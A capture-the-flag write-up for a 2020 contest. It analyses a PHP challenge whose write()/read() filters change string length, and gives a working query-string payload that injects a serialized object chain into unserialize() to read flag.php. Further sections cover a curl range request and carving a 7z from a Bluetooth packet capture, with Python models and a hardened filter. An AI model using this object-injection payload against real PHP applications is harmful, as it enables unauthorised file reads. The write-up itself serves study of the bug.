Anheng 2020 April Contest

I can only do the easy problems and scrape together a few points 😢

web1

<?php

show_source("index.php");
function write ($data) {
return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data);
}

function read ($data) {
return str_replace('\0\0\0', chr(0) . '*' . chr(0), $data);
}

class A {
public $username;
public $password;

function __construct ($a, $b) {
$this->username = $a;
$this->password = $b;
}
}

class B {
public $b ="gpy";
function __destruct () {
$c = 'a' . $this->b;
echo $c;
}
}

class C {
public $c;

function __toString () {
//flag.php
echo file_get_contents($this->c);
return 'nice';
}
}
$a = new A($_GET['a'],$_GET['b']);
$b = unserialize(read(write(serialize($a))));
function read ($data) {
return str_replace('\0\0\0', chr(0) . '*' . chr(0), $data);
}

write() turns chr(0) . '*' . chr(0) into \0\0\0 and read() turns it back, but the former is only three characters and the latter six, so the stored string changes length while the s:N: length that serialize() wrote stays the same, and characters escape the string.

payload

?a=\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0&b=;s:";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}}}
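To make the length mismatch concrete, here is an added Python model of the challenge's write()/read() pair (this is not code from the writeup or the challenge). It reproduces the two filters and the shape of serialize(new A(...)) for ASCII input, checks the one property a storage filter must have (read(write(x)) == x), measures how many characters a stored value loses on the way back, and contrasts it with an injective escaping scheme that survives the round trip. Names such as serialize_a, round_trip_is_identity, shrinkage, safe_write and safe_read are my own.

```python
# Added example, not part of the writeup: model of the challenge's write()/read() filters.
import re

NUL_STAR_NUL = "\x00*\x00"   # 3 chars: PHP's serialized prefix for a protected property name
ESCAPED = r"\0\0\0"          # 6 chars: the literal text \0\0\0 used as its "safe" spelling


def write(data: str) -> str:
    """Challenge's write(): the 3-char sequence becomes a 6-char literal (lengthens)."""
    return data.replace(NUL_STAR_NUL, ESCAPED)


def read(data: str) -> str:
    """Challenge's read(): the 6-char literal becomes the 3-char sequence (shortens)."""
    return data.replace(ESCAPED, NUL_STAR_NUL)


def serialize_a(username: str, password: str) -> str:
    """Mimic PHP's serialize(new A($username, $password)) for ASCII input
    (PHP counts bytes; for ASCII, len() agrees)."""
    return ('O:1:"A":2:{s:8:"username";s:%d:"%s";s:8:"password";s:%d:"%s";}'
            % (len(username), username, len(password), password))


def round_trip_is_identity(serialized: str) -> bool:
    """Property a storage filter must have: read(write(x)) == x.
    The challenge's pair fails it whenever x already contains the literal \\0\\0\\0,
    because read() rewrites text that write() never produced."""
    return read(write(serialized)) == serialized


def shrinkage(serialized: str) -> int:
    """Characters lost on the way back. Each lost character lets one more
    user-supplied character slip past the s:N:"..." length serialize() wrote,
    which is exactly what the payload above relies on."""
    return len(serialized) - len(read(write(serialized)))


# Hardened pair: escape the escape character first, so the encoding is injective
# and no input can pre-empt the decoder. (Not unserializing user data at all is
# still the first-order fix.)
def safe_write(data: str) -> str:
    return data.replace("\\", "\\\\").replace(NUL_STAR_NUL, ESCAPED)


_TOKEN = re.compile(r"\\\\|\\0\\0\\0")   # matches either an escaped backslash or \0\0\0


def safe_read(data: str) -> str:
    # One left-to-right pass, so a decoded backslash is never re-interpreted.
    return _TOKEN.sub(lambda m: "\\" if m.group() == "\\\\" else NUL_STAR_NUL, data)


if __name__ == "__main__":
    benign = serialize_a("alice", "secret")
    hostile = serialize_a("\\0" * 27, "x")   # the writeup's 27 copies of \0
    print(round_trip_is_identity(benign), shrinkage(benign))     # True 0
    print(round_trip_is_identity(hostile), shrinkage(hostile))   # False 27
    print(safe_read(safe_write(hostile)) == hostile)             # True
```

The 27 characters of shrinkage for the username above are what allow exactly 27 characters of the password field to be consumed into the username string, moving the parser's cursor so that the rest of the password is parsed as top-level serialized data.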

MISC

6G sign-in

curl --range 0-100 http://balabala/1Gfile.file
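The one-liner works because HTTP range requests let a client fetch only the bytes it needs from a huge file. As an added illustration (not part of the writeup), the Python below runs a tiny local server that honours the bytes=a-b form of the Range header and a client that asks for the same window as curl --range 0-100. Two details worth seeing: the end offset is inclusive, so 0-100 returns 101 bytes, and a server that ignores Range answers 200 with the whole body, so the client must check for 206 before trusting that it got a partial response. The file contents, the RangeHandler class and the fetch_range/first_bytes helpers are constructed for this example.

```python
# Added example, not part of the writeup: minimal HTTP Range round trip.
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for the 6G file: a flag-like marker up front, junk after it.
BIG_FILE = b"flag{first-bytes-are-all-you-need}\n" + b"A" * 10_000


class RangeHandler(BaseHTTPRequestHandler):
    """Serves BIG_FILE and understands 'Range: bytes=start-end' (end inclusive)."""

    def do_GET(self):
        rng = self.headers.get("Range")
        if rng is None or not rng.startswith("bytes="):
            self._send(200, BIG_FILE, None)          # no range: whole file, status 200
            return
        start_s, _, end_s = rng[len("bytes="):].partition("-")
        start = int(start_s)
        end = int(end_s) if end_s else len(BIG_FILE) - 1   # open-ended range: to EOF
        end = min(end, len(BIG_FILE) - 1)
        if start > end:
            self.send_response(416)                   # Range Not Satisfiable
            self.end_headers()
            return
        chunk = BIG_FILE[start:end + 1]
        self._send(206, chunk, f"bytes {start}-{end}/{len(BIG_FILE)}")

    def _send(self, status, body, content_range):
        self.send_response(status)
        self.send_header("Accept-Ranges", "bytes")
        self.send_header("Content-Length", str(len(body)))
        if content_range:
            self.send_header("Content-Range", content_range)
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *_):
        pass  # keep the example quiet


def start_server():
    srv = HTTPServer(("127.0.0.1", 0), RangeHandler)   # port 0: pick a free port
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def fetch_range(url, start, end):
    """Equivalent of `curl --range start-end url`: returns (status, Content-Range, body).
    Only a 206 means the server actually honoured the range."""
    req = urllib.request.Request(url, headers={"Range": f"bytes={start}-{end}"})
    with urllib.request.urlopen(req) as resp:
        return resp.status, resp.headers.get("Content-Range"), resp.read()


def first_bytes(start, end):
    """Spin up the local server, fetch one window, tear the server down."""
    srv = start_server()
    try:
        host, port = srv.server_address
        return fetch_range(f"http://{host}:{port}/1Gfile.file", start, end)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    status, crange, body = first_bytes(0, 100)
    print(status, crange, len(body), body[:40])
```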

MISC1

The download is a packet capture.

A quick look shows it is Bluetooth traffic.

First sort by protocol.

Look for OBEX, the Bluetooth object transfer protocol.

Copy out the data block of the 7z archive, save it as a .7z file with WinHex or 010 Editor, and extract it; it asks for a PIN.

Clear the filter and Ctrl+F for "PIN"; it is there, and extracting with it gives the flag.
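Copying the archive out by hand in a hex editor works, but the 7z container tells you exactly where it ends, so the cut can be made programmatically from the reassembled OBEX payload. The added Python below (not part of the writeup) carves 7z archives from an arbitrary byte blob: it finds the 6-byte signature, validates the CRC32 of the 20-byte start header, uses NextHeaderOffset and NextHeaderSize to compute the archive's total length (32 + offset + size), and validates the next-header CRC before accepting the candidate. The header layout is from the 7z format description; the build_fake_7z helper and the surrounding junk bytes are constructed so the example runs offline, and it does not decompress anything.

```python
# Added example, not part of the writeup: carve 7z archives out of a byte blob.
import struct
import zlib

SIG = b"7z\xbc\xaf\x27\x1c"      # 7z signature, 6 bytes
START_HEADER_LEN = 32            # signature(6) + version(2) + StartHeaderCRC(4) + start header(20)


def build_fake_7z(packed: bytes, next_header: bytes) -> bytes:
    """Construct a structurally valid 7z container (constructed test data; the
    packed streams are arbitrary bytes, so this is not an extractable archive)."""
    start = struct.pack("<QQI", len(packed), len(next_header), zlib.crc32(next_header))
    return SIG + b"\x00\x04" + struct.pack("<I", zlib.crc32(start)) + start + packed + next_header


def carve_7z(blob: bytes):
    """Return [(offset, archive_bytes), ...] for every 7z archive whose start
    header and next header CRCs check out. Truncated or corrupted candidates
    are skipped rather than guessed at."""
    found = []
    pos = blob.find(SIG)
    while pos != -1:
        hdr = blob[pos:pos + START_HEADER_LEN]
        if len(hdr) == START_HEADER_LEN:
            (start_crc,) = struct.unpack("<I", hdr[8:12])
            if zlib.crc32(hdr[12:32]) == start_crc:
                nh_offset, nh_size, nh_crc = struct.unpack("<QQI", hdr[12:32])
                total = START_HEADER_LEN + nh_offset + nh_size
                archive = blob[pos:pos + total]
                if len(archive) == total and zlib.crc32(archive[START_HEADER_LEN + nh_offset:]) == nh_crc:
                    found.append((pos, archive))
        pos = blob.find(SIG, pos + 1)
    return found


if __name__ == "__main__":
    fake = build_fake_7z(b"P" * 16, b"H" * 8)
    blob = b"\x00obex-junk\xff" * 3 + fake + b"trailing bytes"
    for off, arc in carve_7z(blob):
        print(f"7z archive at offset {off}, {len(arc)} bytes")
```

Once the carved bytes are written to a .7z file, the extraction step proceeds exactly as in the writeup; the CRC checks simply guarantee the cut was made at the right place instead of one byte short or long.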

Study hard and make progress every day.